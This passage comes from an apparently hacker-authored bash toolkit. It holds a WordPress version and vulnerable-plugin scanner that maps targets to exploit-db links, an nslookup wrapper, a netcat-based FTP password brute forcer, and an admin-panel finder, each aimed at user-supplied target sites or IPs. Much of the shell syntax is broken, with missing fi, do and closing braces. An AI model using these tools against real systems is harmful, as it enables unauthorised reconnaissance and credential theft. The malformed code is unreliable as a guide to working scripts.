  1659. ref[146]="http://www.exploit-db.com/exploits/17872/"
  1660. ref[147]="http://www.exploit-db.com/exploits/17872/"
  1661. ref[148]="http://www.exploit-db.com/exploits/17872/"
  1662. ref[149]="http://www.exploit-db.com/exploits/17872/"
  1663. ref[150]="http://www.exploit-db.com/exploits/17872/"
  1664. ref[151]="http://www.exploit-db.com/exploits/17872/"
  1665. ref[152]="http://www.exploit-db.com/exploits/17872/"
  1666. ref[153]="http://www.exploit-db.com/exploits/17872/"
  1667. ref[154]="http://www.exploit-db.com/exploits/17872/"
  1668. ref[155]="http://www.exploit-db.com/exploits/17872/"
  1669. ref[156]="http://www.exploit-db.com/exploits/17872/"
  1670. ref[157]="http://www.exploit-db.com/exploits/17872/"
  1671. ref[158]="http://www.exploit-db.com/exploits/17872/"
  1672. ref[159]="http://www.exploit-db.com/exploits/17872/"
  1673. ref[160]="http://www.exploit-db.com/exploits/17872/"
  1674. ref[161]="http://www.exploit-db.com/exploits/17872/"
  1675. ref[162]="http://www.exploit-db.com/exploits/17887/"
  1676. ref[163]="http://www.exploit-db.com/exploits/17888/"
  1677. ref[164]="http://www.exploit-db.com/exploits/17891/"
  1678. ref[165]="http://www.exploit-db.com/exploits/17894/ : http://www.1337day.com/exploits/17826"
  1679. ref[166]="http://www.exploit-db.com/exploits/17906/"
  1680. ref[167]="http://www.exploit-db.com/exploits/17970/"
  1681. ref[168]="http://www.exploit-db.com/exploits/17973/"
  1682. ref[169]="http://www.exploit-db.com/exploits/17980/"
  1683. ref[170]="http://www.exploit-db.com/exploits/17983/"
  1684. ref[171]="http://www.exploit-db.com/exploits/17987/"
  1685. ref[172]="http://www.exploit-db.com/exploits/18053/"
  1686. ref[173]="http://www.exploit-db.com/exploits/18055/"
  1687. ref[174]="http://www.exploit-db.com/exploits/18111/ : http://www.1337day.com/exploits/18015"
  1688. ref[175]="http://www.exploit-db.com/exploits/18114/"
  1689. ref[176]="http://www.exploit-db.com/exploits/18126/"
  1690. ref[177]="http://www.exploit-db.com/exploits/18231/"
  1691. ref[178]="http://www.exploit-db.com/exploits/18276/"
  1692. ref[179]="http://www.exploit-db.com/exploits/18330/"
  1693. ref[180]="http://www.exploit-db.com/exploits/18350/"
  1694. ref[181]="http://www.exploit-db.com/exploits/18353/"
  1695. ref[182]="http://www.exploit-db.com/exploits/18355/"
  1696. ref[183]="http://www.exploit-db.com/exploits/18390/"
  1697. ref[184]="http://www.exploit-db.com/exploits/18412/"
  1698. ref[185]="http://www.exploit-db.com/exploits/18787/ : http://www.exploit-db.com/exploits/18806/ : http://www.1337day.com/exploits/18015"
  1699. ref[186]="http://www.exploit-db.com/exploits/18987/"
  1700. ref[187]="http://www.exploit-db.com/exploits/18988/"
  1701. ref[188]="http://www.exploit-db.com/exploits/18989/"
  1702. ref[189]="http://www.exploit-db.com/exploits/18990/"
  1703. ref[190]="http://www.exploit-db.com/exploits/18991/ : http://www.exploit-db.com/exploits/19100/"
  1704. ref[191]="http://www.exploit-db.com/exploits/18993/"
  1705. ref[192]="http://www.exploit-db.com/exploits/18994/"
  1706. ref[193]="http://www.exploit-db.com/exploits/18997/ : http://www.1337day.com/exploits/18471"
  1707. ref[194]="http://www.exploit-db.com/exploits/18998/"
  1708. ref[195]="http://www.exploit-db.com/exploits/19008/"
  1709. ref[196]="http://www.exploit-db.com/exploits/19009/"
  1710. ref[197]="http://www.exploit-db.com/exploits/19023/"
  1711. ref[198]="http://www.exploit-db.com/exploits/19022/"
  1712. ref[199]="http://www.exploit-db.com/exploits/19021/"
  1713. ref[200]="http://www.exploit-db.com/exploits/19020/"
  1714. ref[201]="http://www.exploit-db.com/exploits/19019/"
  1715. ref[202]="http://www.exploit-db.com/exploits/19018/"
  1716. ref[203]="http://www.exploit-db.com/exploits/19016/"
  1717. ref[204]="http://www.exploit-db.com/exploits/19013/"
  1718. ref[205]="http://www.exploit-db.com/exploits/19012/"
  1719. ref[206]="http://www.exploit-db.com/exploits/19036/"
  1720. ref[207]="http://www.exploit-db.com/exploits/19058/"
  1721. ref[208]="http://www.exploit-db.com/exploits/19057/"
  1722. ref[209]="http://www.exploit-db.com/exploits/19056/"
  1723. ref[210]="http://www.exploit-db.com/exploits/19055/"
  1724. ref[211]="http://www.exploit-db.com/exploits/19054/"
  1725. ref[212]="http://www.exploit-db.com/exploits/19053/"
  1726. ref[213]="http://www.exploit-db.com/exploits/19052/"
  1727. ref[214]="http://www.exploit-db.com/exploits/19050/"
  1728. ref[215]="http://www.1337day.com/exploits/17860"
  1729. ref[216]="http://www.1337day.com/exploits/17906"
  1730. ref[217]="http://www.1337day.com/exploits/17931"
  1731. ref[218]="http://www.1337day.com/exploits/17992"
  1732. ref[219]="http://www.1337day.com/exploits/17994"
  1733. ref[220]="http://www.1337day.com/exploits/18012"
  1734. ref[221]="http://www.1337day.com/exploits/18049"
  1735. ref[222]="http://www.1337day.com/exploits/18371"
  1736. ref[223]="http://www.1337day.com/exploits/18444"
  1737. ref[224]="http://www.1337day.com/exploits/18496"
  1738. ref[225]="http://www.1337day.com/exploits/18529"
  1739. ref[226]="http://www.1337day.com/exploits/18530"
  1740. ref[227]="http://www.1337day.com/exploits/18566"
  1741. ref[228]="http://www.1337day.com/exploits/18567"
  1742. ref[229]="http://www.1337day.com/exploits/18586"
  1743. ref[230]="http://www.1337day.com/exploits/18589"
  1744. ref[231]="http://www.exploit-db.com/exploits/19187/"
  1745. ref[232]="http://www.1337day.com/exploits/18668"
  1746. ref[233]="http://www.1337day.com/exploits/18684"
  1747. ref[234]="http://www.1337day.com/exploits/18685"
  1748. ref[235]="http://www.1337day.com/exploits/18686"
  1749. ref[236]="http://www.1337day.com/exploits/18687"
  1750. ref[237]="http://www.1337day.com/exploits/18688"
  1751. ref[238]="http://www.1337day.com/exploits/18133"
  1752. ref[239]="http://www.exploit-db.com/exploits/17728/"
  1753. ref[240]="http://www.exploit-db.com/exploits/17729/"
  1754. ref[241]="http://packetstorm.interhost.co.il/1203-exploits/wpdeans-shell.txt"
  1755. ref[242]="http://www.exploit-db.com/exploits/17628/"
  1756. OIFS=$IFS
  1757. IFS=""
  1758. XPLC="0" # Number of Vulnerable Plugins Found
  1759. XPL="" # Vulnerable Plugins Found
  1760. XPLR="" # Vulnerable Plugins Found Ref.
  1761. TOTALTEST=${#vulns[@]}
  1762. let "TOTALTEST -= 1" # Total Tested Plugins
  1763. echo
  1764. echo -e "$YELLOW Scanning $web for the vulnerability"
  1765. echo -e "$RED Let the scanner scans till it finishes so that it can dump the Results in a txt Document ^_^"
  1766. echo -e "$YELLOW <^>-------------------Scanning Result--------------------<^>"
  1767. echo
  1768. echo -e "$YELLOW[+] Website :- \e[0m $web "
  1769. echo -e "$YELLOW[+] Vulnerable Plugins in Our Database :- \e[0m $TOTALTEST"
  1770. #Wordpress Version finder
  1771. VERSION=`$CURL --url $web/readme.html 2> /dev/null | $GREP Version | $CUT -b 17-`
  1772. echo
  1773. echo -e "$GREEN [+] Wordpress Version:-\e[0m $VERSION"
  1774. echo
  1775. # Wordpress version exploit
  1776. if [[ $VERSION == "" || $VERSION == null ]]; then
  1777. echo
  1778. echo -e "$RED Wordpress Scanner is not able to recognize the $web Wordpress Version"
  1779. echo -en " Check it Manually (Y/n):$GREEN "
  1780. read CHOSEN
  1781. echo
  1782. if [[ $CHOSEN == "N" || $CHOSEN == "n" ]]; then
  1783. echo
  1784. echo " Exiting WP-Version scanner"
  1785. echo
  1786. exit
  1787. elif [[ $CHOSEN -ne "Y" && $CHOSEN -ne "y" ]]; then
  1788. echo
  1789. echo " Option Not available :P"
  1790. echo " Bye ;-("
  1791. echo
  1792. exit
  1793. fi
  1794. else
  1795. echo
  1796. echo -e "$YELLOW <^>List of Exploit Versions<^>-$BLUE"
  1797. echo
  1798. case $VERSION in
  1799. 3.4.2)
  1800. echo -e " $STRXPL http://packetstormsecurity.org/files/116785/WordPress-3.4.2-Cross-Site-Request-Forgery.html (= 3.4.2)"
  1801. ;;
  1802. 3.4)
  1803. echo -e " $STRXPL http://www.exploit-db.com/exploits/18791/ (<= 3.4)"
  1804. ;;
  1805. 3.3.2)
  1806. echo -e " $STRXPL http://www.1337day.com/exploits/18435/ (= 3.3.2)"
  1807. echo
  1808. ;;
  1809. 3.3.1)
  1810. echo -e " $STRXPL http://www.exploit-db.com/exploits/18791/ (= 3.3.1)"
  1811. echo -e " $STRXPL http://www.exploit-db.com/exploits/18417/ (<= 3.3.1)"
  1812. echo
  1813. ;;
  1814. 3.3)
  1815. echo -e " $STRXPL http://www.exploit-db.com/exploits/18417/ (<= 3.3.1)"
  1816. echo
  1817. ;;
  1818. 3.2.1)
  1819. echo -e " $STRXPL http://www.1337day.com/exploits/16740 (= 3.2.1)"
  1820. echo
  1821. ;;
  1822. 3.2)
  1823. ;;
  1824. 3.1.4)
  1825. ;;
  1826. 3.1.3)
  1827. ;;
  1828. 3.1.2)
  1829. ;;
  1830. 3.1.1)
  1831. ;;
  1832. 3.1)
  1833. ;;
  1834. 3.0.6)
  1835. ;;
  1836. 3.0.5)
  1837. ;;
  1838. 3.0.4)
  1839. ;;
  1840. 3.0.3)
  1841. ;;
  1842. 3.0.2)
  1843. ;;
  1844. 3.0.1)
  1845. ;;
  1846. 3.0)
  1847. ;;
  1848. 2.9.2)
  1849. echo -e " $STRXPL http://www.exploit-db.com/exploits/11441/ (>= 2.9)"
  1850. echo -e " $STRXPL http://www.exploit-db.com/exploits/10825/ (<= 2.9.x)"
  1851. echo
  1852. ;;
  1853. 2.9.1)
  1854. echo -e " $STRXPL http://www.exploit-db.com/exploits/11441/ (>= 2.9)"
  1855. echo -e " $STRXPL http://www.exploit-db.com/exploits/10825/ (<= 2.9.x)"
  1856. echo
  1857. ;;
  1858. 2.9)
  1859. echo -e " $STRXPL http://www.exploit-db.com/exploits/11441/ (>= 2.9)"
  1860. echo -e " $STRXPL http://www.exploit-db.com/exploits/10825/ (<= 2.9.x)"
  1861. echo
  1862. ;;
  1863. 2.8.6)
  1864. ;;
  1865. 2.8.5)
  1866. echo -e " $STRXPL http://www.exploit-db.com/exploits/10089/ (<= 2.8.5)"
  1867. echo
  1868. ;;
  1869. 2.8.4)
  1870. echo -e " $STRXPL http://www.exploit-db.com/exploits/10089/ (<= 2.8.5)"
  1871. echo
  1872. ;;
  1873. 2.8.3)
  1874. echo -e " $STRXPL http://www.exploit-db.com/exploits/10089/ (<= 2.8.5)"
  1875. echo -e " $STRXPL http://www.exploit-db.com/exploits/9410/ (<= 2.8.3)"
  1876. echo
  1877. ;;
  1878. 2.8.2)
  1879. echo -e " $STRXPL http://www.exploit-db.com/exploits/10089/ (<= 2.8.5)"
  1880. echo -e " $STRXPL http://www.exploit-db.com/exploits/9410/ (<= 2.8.3)"
  1881. echo
  1882. ;;
  1883. 2.8.1)
  1884. echo -e " $STRXPL http://www.exploit-db.com/exploits/10089/ (<= 2.8.5)"
  1885. echo -e " $STRXPL http://www.exploit-db.com/exploits/9410/ (<= 2.8.3)"
  1886. echo -e " $STRXPL http://www.exploit-db.com/exploits/9250/ (= 2.8.1)"
  1887. echo -e " $STRXPL http://www.exploit-db.com/exploits/9110/ (<= 2.8.1)"
  1888. echo
  1889. ;;
  1890. 2.8)
  1891. echo -e " $STRXPL http://www.exploit-db.com/exploits/10089/ (<= 2.8.5)"
  1892. echo -e " $STRXPL http://www.exploit-db.com/exploits/9410/ (<= 2.8.3)"
  1893. echo -e " $STRXPL http://www.exploit-db.com/exploits/9110/ (<= 2.8.1)"
  1894. echo
  1895. ;;
  1896. 2.7.1)
  1897. echo -e " $STRXPL http://www.exploit-db.com/exploits/10088/ (<= 2.7.1)"
  1898. echo
  1899. ;;
  1900. 2.7)
  1901. echo -e " $STRXPL http://www.exploit-db.com/exploits/10088/ (<= 2.7.1)"
  1902. echo
  1903. ;;
  1904. 2.6.5)
  1905. echo -e " $STRXPL http://www.exploit-db.com/exploits/8196/ (< 2.7.x)"
  1906. echo
  1907. ;;
  1908. 2.6.4)
  1909. echo -e " $STRXPL http://www.exploit-db.com/exploits/8196/ (< 2.7.x)"
  1910. echo
  1911. ;;
  1912. 2.6.3)
  1913. echo -e " $STRXPL http://www.exploit-db.com/exploits/8196/ (< 2.7.x)"
  1914. echo
  1915. ;;
  1916. 2.6.2)
  1917. echo -e " $STRXPL http://www.exploit-db.com/exploits/8196/ (< 2.7.x)"
  1918. echo
  1919. ;;
  1920. 2.6.1)
  1921. echo -e " $STRXPL http://www.exploit-db.com/exploits/8196/ (< 2.7.x)"
  1922. echo -e " $STRXPL http://www.exploit-db.com/exploits/6421/ (= 2.6.1)"
  1923. echo -e " $STRXPL http://www.exploit-db.com/exploits/6397/ (= 2.6.1)"
  1924. echo
  1925. ;;
  1926. 2.6)
  1927. echo -e " $STRXPL http://www.exploit-db.com/exploits/8196/ (< 2.7.x)"
  1928. echo
  1929. ;;
  1930. 2.5.1)
  1931. ;;
  1932. 2.5)
  1933. ;;
  1934. 2.3.3)
  1935. ;;
  1936. 2.3.2)
  1937. ;;
  1938. 2.3.1)
  1939. echo -e " $STRXPL http://www.exploit-db.com/exploits/4721/ (<= 2.3.1)"
  1940. echo
  1941. ;;
  1942. 2.3)
  1943. echo -e " $STRXPL http://www.exploit-db.com/exploits/4721/ (<= 2.3.1)"
  1944. echo
  1945. ;;
  1946. 2.2.3)
  1947. echo -e " $STRXPL http://www.exploit-db.com/exploits/4113/ (< 2.2.x)"
  1948. echo
  1949. ;;
  1950. 2.2.2)
  1951. echo -e " $STRXPL http://www.exploit-db.com/exploits/4113/ (< 2.2.x)"
  1952. echo
  1953. ;;
  1954. 2.2.1)
  1955. echo -e " $STRXPL http://www.exploit-db.com/exploits/4113/ (< 2.2.x)"
  1956. echo
  1957. ;;
  1958. 2.2)
  1959. echo -e " $STRXPL http://www.exploit-db.com/exploits/4039/ (= 2.2.x)"
  1960. echo -e " $STRXPL http://www.exploit-db.com/exploits/4113/ (< 2.2.x)"
  1961. echo
  1962. ;;
  1963. 2.1.3)
  1964. echo -e " $STRXPL http://www.exploit-db.com/exploits/3960/ (= 2.1.3)"
  1965. echo
  1966. ;;
  1967. 2.1.2)
  1968. echo -e " $STRXPL http://www.exploit-db.com/exploits/3656/ (= 2.1.2)"
  1969. echo
  1970. ;;
  1971. 2.1.1)
  1972. ;;
  1973. 2.1)
  1974. ;;
  1975. 2.0.11)
  1976. ;;
  1977. 2.0.10)
  1978. ;;
  1979. 2.0.9)
  1980. ;;
  1981. 2.0.8)
  1982. ;;
  1983. 2.0.7)
  1984. ;;
  1985. 2.0.6)
  1986. echo -e " $STRXPL http://www.exploit-db.com/exploits/3109/ (<= 2.0.6)"
  1987. echo
  1988. ;;
  1989. 2.0.5)
  1990. echo -e " $STRXPL http://www.exploit-db.com/exploits/3109/ (<= 2.0.6)"
  1991. echo -e " $STRXPL http://www.exploit-db.com/exploits/3095/ (<= 2.0.5)"
  1992. echo
  1993. ;;
  1994. 2.0.4)
  1995. echo -e " $STRXPL http://www.exploit-db.com/exploits/3109/ (<= 2.0.6)"
  1996. echo -e " $STRXPL http://www.exploit-db.com/exploits/3095/ (<= 2.0.5)"
  1997. echo
  1998. ;;
  1999. 2.0.3)
  2000. echo -e " $STRXPL http://www.exploit-db.com/exploits/3109/ (<= 2.0.6)"
  2001. echo -e " $STRXPL http://www.exploit-db.com/exploits/3095/ (<= 2.0.5)"
  2002. echo
  2003. ;;
  2004. 2.0.2)
  2005. echo -e " $STRXPL http://www.exploit-db.com/exploits/3109/ (<= 2.0.6)"
  2006. echo -e " $STRXPL http://www.exploit-db.com/exploits/3095/ (<= 2.0.5)"
  2007. echo -e " $STRXPL http://www.exploit-db.com/exploits/6/ (<= 2.0.2)"
  2008. echo
  2009. ;;
  2010. 2.0.1)
  2011. echo -e " $STRXPL http://www.exploit-db.com/exploits/3109/ (<= 2.0.6)"
  2012. echo -e " $STRXPL http://www.exploit-db.com/exploits/3095/ (<= 2.0.5)"
  2013. echo -e " $STRXPL http://www.exploit-db.com/exploits/6/ (<= 2.0.2)"
  2014. echo
  2015. ;;
  2016. 2.0)
  2017. echo -e " $STRXPL http://www.exploit-db.com/exploits/3109/ (<= 2.0.6)"
  2018. echo -e " $STRXPL http://www.exploit-db.com/exploits/3095/ (<= 2.0.5)"
  2019. echo -e " $STRXPL http://www.exploit-db.com/exploits/6/ (<= 2.0.2)"
  2020. echo
  2021. ;;
  2022. 1.5.2)
  2023. ;;
  2024. 1.5.1.3)
  2025. echo -e " $STRXPL http://www.exploit-db.com/exploits/3051/ (<= 1.5.1.3)"
  2026. echo -e " $STRXPL http://www.exploit-db.com/exploits/1142/ (<= 1.5.1.3)"
  2027. echo
  2028. ;;
  2029. 1.5.1.2)
  2030. echo -e " $STRXPL http://www.exploit-db.com/exploits/3051/ (<= 1.5.1.3)"
  2031. echo -e " $STRXPL http://www.exploit-db.com/exploits/1142/ (<= 1.5.1.3)"
  2032. echo -e " $STRXPL http://www.exploit-db.com/exploits/1077/ (<= 1.5.1.2)"
  2033. echo
  2034. ;;
  2035. 1.5.1.1)
  2036. echo -e " $STRXPL http://www.exploit-db.com/exploits/3051/ (<= 1.5.1.3)"
  2037. echo -e " $STRXPL http://www.exploit-db.com/exploits/1142/ (<= 1.5.1.3)"
  2038. echo -e " $STRXPL http://www.exploit-db.com/exploits/1077/ (<= 1.5.1.2)"
  2039. echo -e " $STRXPL http://www.exploit-db.com/exploits/1059/ (<= 1.5.1.1)"
  2040. echo -e " $STRXPL http://www.exploit-db.com/exploits/1033/ (<= 1.5.1.1)"
  2041. echo
  2042. ;;
  2043. 1.3.2)
  2044. echo -e " $STRXPL http://www.exploit-db.com/exploits/5066/ (<= 1.3.2)"
  2045. echo
  2046. ;;
  2047. 1.2.2)
  2048. echo -e " $STRXPL http://www.exploit-db.com/exploits/4113/ (<= 1.2.2)"
  2049. echo
  2050. ;;
  2051. *)
  2052. echo -e " $STRXPL 0 (None)"
  2053. echo
  2054. ;;
  2055. esac
  2056. echo
  2057. echo -e "$YELLOW <^> Wordpress Vulnerable Plugins <^> $NO"
  2058. echo
  2059. for x in ${vulns[*]}; do
  2060. code=`$CURL -A $BANNER -sL -w "%{http_code}\\n" $web${vulns[$i]} -o "/dev/null"`
  2061. echo -e "$YELLOW [+] TESTED PLUGINS: $NO $i / $TOTALTEST"
  2062. if [ $i -le 9 ]; then
  2063. echo -e -n "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"
  2064. echo " [$i] -> $web${vulns[$i]}"
  2065. elif [ $i -le 99 ]; then
  2066. echo -e -n "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"
  2067. echo " [$i] -> $web${vulns[$i]}"
  2068. else
  2069. echo -e -n "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"
  2070. echo " [$i] -> $web${vulns[$i]}"
  2071. fi
  2072. if [ "$code" == "200" ]; then
  2073. echo -e "$RED [+] EXPLOIT:$NO ${ref[$i]}"
  2074. echo
  2075. fi
  2076. XPL[$y]=${vulns[$i]}
  2077. XPLR[$y]=${ref[$i]}
  2078. let XPLC=$XPLC+1
  2079. let y=$y+1
  2080. if [ "$code" == "404" ]; then
  2081. echo "[+] 404 Not found Plugin Not found "
  2082. let i=$i+1
  2083. sleep $TIME
  2084. done
  2085. #Summary
  2086. echo
  2087. echo -e "$BLUE<^>---------------- [- $RED Scanning Results $BLUE -]"
  2088. echo
  2089. echo -e " $GREEN
  2090. ____ ____ ____ ____ ___ ___ ____ ____ _ _ __ ___
  2091. (_ _)( _ \ ___ ( _ \(_ _)/ __) / __)( ___)( _ \ ( \/ ) /. | / _ \
  2092. _)(_ )___/ (___) )(_) )_)(_( (_-.( (_-. )__) ) / \ / (_ _) ( (_) )
  2093. (____)(__) (____/(____)\___/ \___/(____)(_)\_) \/ (_) () \___/
  2094. $RED
  2095. ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^
  2096. /W\ /O\ /R\ /D\ /P\ /E\ /S\ /S\ /D\ /U\ /M\ /P\ /E\ /D\ /R\ /E\ /S\ /U\ /L\ /T\ /S\
  2097. <___><___><___><___><___><___><___><___> <___><___><___><___><___><___> <___><___><___><___><___><___><___>
  2098. echo -e "
  2099. ____ ____ ____ ____ ___ ___ ____ ____ _ _ __ ___
  2100. (_ _)( _ \ ___ ( _ \(_ _)/ __) / __)( ___)( _ \ ( \/ ) /. | / _ \
  2101. _)(_ )___/ (___) )(_) )_)(_( (_-.( (_-. )__) ) / \ / (_ _) ( (_) )
  2102. (____)(__) (____/(____)\___/ \___/(____)(_)\_) \/ (_) () \___/
  2103. ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^
  2104. /W\ /O\ /R\ /D\ /P\ /E\ /S\ /S\ /D\ /U\ /M\ /P\ /E\ /D\ /R\ /E\ /S\ /U\ /L\ /T\ /S\
  2105. <___><___><___><___><___><___><___><___> <___><___><___><___><___><___> <___><___><___><___><___><___><___>
  2106. \n" >>$LOGFILE
  2107. echo -e "$RED [+] Report Date :- [$YELLOW " `date` "$RED ]"
  2108. echo -e "[+] Report Date :- [ "`date`" ] \n" >> $LOGFILE
  2109. echo
  2110. echo -e "$RED [+] Website :- $YELLOW $web"
  2111. echo "[+] Website :- $web " >> $LOGFILE
  2112. echo -e "$RED [+] Vulnerable Plugins In Database:- $YELLOW $XPLC"
  2113. echo -e "[+] Vulnerable Plugins :- $XPLC" >> $LOGFILE
  2114. echo
  2115. echo -e "$RED [+] Wordpress Version :- $YELLOW $VERSION"
  2116. echo -e "[+] Wordpress Version :- $VERSION" >> $LOGFILE
  2117. echo
  2118. for x in ${XPL[*]}; do
  2119. echo -e "$RED [$z]$YELLOW ${XPL[$z]}"
  2120. echo -e " [$z] ${XPL[$z]}" >> $LOGFILE
  2121. echo -e "$RED EXPLOIT:$YELLOW ${XPLR[$z]}"
  2122. echo -e " EXPLOIT: ${XPLR[$z]}" >> $LOGFILE
  2123. echo
  2124. let z=$z+1
  2125. done
  2126. echo
  2127. echo -e " $GREEN Result Has been save in IP-Digger_Wordpress_scan File $RED ;-)"
  2128. echo
  2129. #=========================================================================================================================================
  2130. #<!--- NSLOOKUP LOOP ---!>
  2131. if [ "$mychoice" = "16" ]; then
  2132. {
  2133. echo
  2134. echo " !-------------- NS LOOKUP --------------! "
  2135. echo -e " \e[1;31m Coded By Un_N0n "
  2136. echo
  2137. echo -e " \e[1;31m =========================================================\e[0m"
  2138. echo
  2139. read -p " # ~ >> Enter The Website Here : " addr
  2140. # No input
  2141. if [ -z $addr ]; then
  2142. echo "-_- ----------------------------- -_- "
  2143. echo -e "\e[1;31m Blank Input \e[0m"
  2144. echo "-_- ----------------------------- -_- "
  2145. exit
  2146. #<!--- LOOP FOR STORING THE RESULT IN FILE ---!>
  2147. echo
  2148. read -p " Do you want to store the results in a file ? y/n -> " ans
  2149. if [ "$ans" = "y" ]; then
  2150. {
  2151. echo -e " \e[1;32mPlease wait while results being generated.\e[0m"
  2152. res=`nslookup $addr > lookup_results`
  2153. echo
  2154. echo -e " \e[1;36m[+] Done. The Info Has Been Stored in File Named Lookup_Results, change its name to prevent overwrite. [+]\e[0m"
  2155. echo
  2156. echo "!-###############################################################-!"
  2157. echo
  2158. }
  2159. else
  2160. {
  2161. echo -e " \e[1;32mPlease wait while results being generated.\e[0m"
  2162. res=`nslookup $addr`
  2163. echo
  2164. echo " The results are :- "
  2165. echo "------------------------------------------------------------------"
  2166. echo -e " \e[1;32m$res\e[0m"
  2167. echo
  2168. echo "!-###############################################################-!"
  2169. echo
  2170. read -p "Press Enter to Cont"
  2171. }
  2172. fi
  2173. #<!--- STORING SCRIPT ENDS HERE ---!>
  2174. }
  2175. fi
  2176. #<!--- NSLOOKUP LOOP ENDS HERE ---!>
  2177. #=================================================================================================
  2178. #FTP Brute
  2179. if [ "$mychoice" = "17" ]; then
  2180. {
  2181. echo " !--------- FTP Brute Forcer ---------!"
  2182. echo " By - Un_N0n "
  2183. echo
  2184. echo
  2185. echo -e " \e[1;36m =========================================================== \e[0m"
  2186. echo
  2187. echo
  2188. read -p "# ~ >> Enter IP ADDR Here : " addr
  2189. read -p "# ~ >> Enter the Port ADDR/ For FTP :- 21 : " paddr
  2190. read -p "# ~ >> Enter the UserName : " uaddr
  2191. read -p "# ~ >> Enter the Path of Wordlist : " waddr
  2192.  
  2193. #<!--- IF STATMENT TO CHECK BLANK INPUT -----------------!>
  2194. if [ -z $addr ]; then
  2195. {
  2196. echo
  2197. echo "XXXXXXXXXXXXXXXXXX-----------XXXXXXXXXXXXXXXXXXXXX"
  2198. echo
  2199. echo -e " \e[1;31mERROR - Blank Input detected.\e[0m"
  2200. echo
  2201. echo "XXXXXXXXXXXXXXXXXX-----------XXXXXXXXXXXXXXXXXXXXX"
  2202. exit
  2203. }
  2204. fi
  2205.  
  2206. #<!--- IF STATMENT FOR BLANK INPUT CHECKING ENDS HERE ---!>
  2207. #<!--- IF STATMENT FOR PUTTING DATA INTO FILE ---!>
  2208. echo
  2209. echo -e "\e[1;32m [*] Connecting... \e[0m"
  2210. echo -e "\e[1;31m [*] Connected , Starting process.. \e[0m"
  2211. echo
  2212. #=============== MAIN CODE FTP BRUTE FROCE BY FURT3X =================
  2213. blklog[1]="/tmp/ftplogz"
  2214. blklog[2]="/tmp/ftplogz2"
  2215. function brute_help() {
  2216. cat <<EOF
  2217. `basename $0` <host_ip> <port> <user> <wordlist>
  2218. `basename $0` 127.0.0.1 21 administrador worlista
  2219. function verde(){
  2220. echo -e "\031[01;32m${@}\032[00m"
  2221. vitima=$addr
  2222. porta=$paddr
  2223. usuario=$uaddr
  2224. wordlista=$waddr
  2225. nc -h >/dev/null 2>/dev/null
  2226. if [ "$?" -eq "127" ];
  2227. then
  2228. echo "need netcat"
  2229. exit
  2230. verde " [*] shbrute netcat ftp brute force"
  2231. echo
  2232. function anonymous(){
  2233. verde " [*] Testing if permit anonymous login"
  2234. #### Ugly but has worked for me ####
  2235. #####################################
  2236. echo "USER anonymous" > ${blklog[1]}; echo "PASS ftp" >>${blklog[1]}; echo "QUIT" >>${blklog[1]}
  2237. nc ${vitima} ${porta} < ${blklog[1]} > ${blklog[2]}
  2238. cat ${blklog[2]} | grep "230" >/dev/null
  2239. if [ "$?" -eq "0" ];
  2240. then
  2241. verde " \e[1;31m[*] Permit anonymous login\e[0m"
  2242. echo
  2243. else
  2244. verde " \e[1;31m[*] Not permit anonymous login\e[0m"
  2245. echo
  2246. function ftpbrute(){
  2247. if [ ! -f "${wordlista}" ];
  2248. then
  2249. echo "wordlist not found"
  2250. exit
  2251. if [ ! -s "${wordlista}" ];
  2252. then
  2253. echo "wordlist not found"
  2254. exit
  2255. verde " [*] Brute Forcing ftp ${vitima}"
  2256. echo
  2257. cat "${wordlista}" |
  2258. while read linhas
  2259. echo "USER ${usuario}" > ${blklog[1]} ; echo "PASS ${linhas}" >> ${blklog[1]} ; echo "QUIT" >> ${blklog[1]}
  2260. nc ${vitima} ${porta} < ${blklog[1]} > ${blklog[2]}
  2261. sleep 0.1
  2262. verde " Trying : ${linhas}"
  2263. cat ${blklog[2]} | grep "230" >/dev/null
  2264. if [ "$?" -eq "0" ];
  2265. then
  2266. echo
  2267. verde " \e[1;31mUser:\e[0m ${usuario}"
  2268. verde " \e[1;31mPass:\e[0m $linhas"
  2269. exit
  2270. fi
  2271. done
  2272. anonymous
  2273. ftpbrute
  2274. echo
  2275. read -p "Press Enter to Cont. : "
  2276. echo "-------------------------------------------------------------"
  2277. echo
  2278. #============== MAIN CODE ENDS =================
  2279. #<!--- IF STATMENT FOR PUTTING DATA INTO FILE ENDS HERE ---!>
  2280. }
  2281. #==================================================================================================
  2282. #<!--- FTP BRUTE FORCER ENDS ---!>
  2283. #==================================================================================================
  2284. #Admin Pnel Finer
  2285. if [ "$mychoice" = "18" ]; then
  2286. echo -e " \e[1;31m !--------- Admin Page Finder ---------!"
  2287. echo -e " \e[1;31m By - Hind Hacker \e[0m"
  2288. echo
  2289. echo -e " \e[1;33m [+]Bugs Removed by - Manoj Nath "
  2290. echo -e " [+] Admin Panel List by Silent Hacker ( Created on my own experience ) "
  2291. echo -e " \e[1;36m =========================================================== \e[0m"
  2292. echo
  2293. var=0
  2294. var2=0
  2295. var3=0
  2296. RED='\e[0;31m'
  2297. GREEN='\e[0;32m'
  2298. BLUE='\e[4;36m'
  2299. echo -n "Enter the website ( For example :- http://www.target.com/ ):- "
  2300. read site
  2301. echo -n "Admin Panel List ( For example ( Default File ) :- admin ) : "
  2302. read admin
  2303. echo
  2304. if [ -z "$site" ];then
  2305. echo -e "\e[1;31m Blank Input Detected in Website Link :P \e[0m"
  2306. echo
  2307. exit
  2308. if [ -z "$admin" ]; then
  2309. echo -e " \e[1;31mBlank Input in Admin List detected :P \e[0m "
  2310. echo
  2311. exit
  2312. echo -e "\e[1;31m [+] Scanning Target :- $site \e[0m"
  2313. exec<$admin
  2314. while read line
  2315. var3=`expr $var3 + 1`
  2316. url=`(curl $site$line --head) 2>&1 | grep "HTTP" | cut -d " " -f 2`
  2317. case $url in
  2318. 200 ) echo -e "$site$line $GREEN<--Success!!!" && tput sgr0 && var=`expr $var + 1`
  2319. 302 ) echo -e "$site$line $BLUE<--Possible (302)" && tput sgr0 && var2=`expr $var2 + 1`
  2320. 404 ) echo -en "$site$line $RED<-- Failed \r" && tput sgr0
  2321. esac
  2322. done
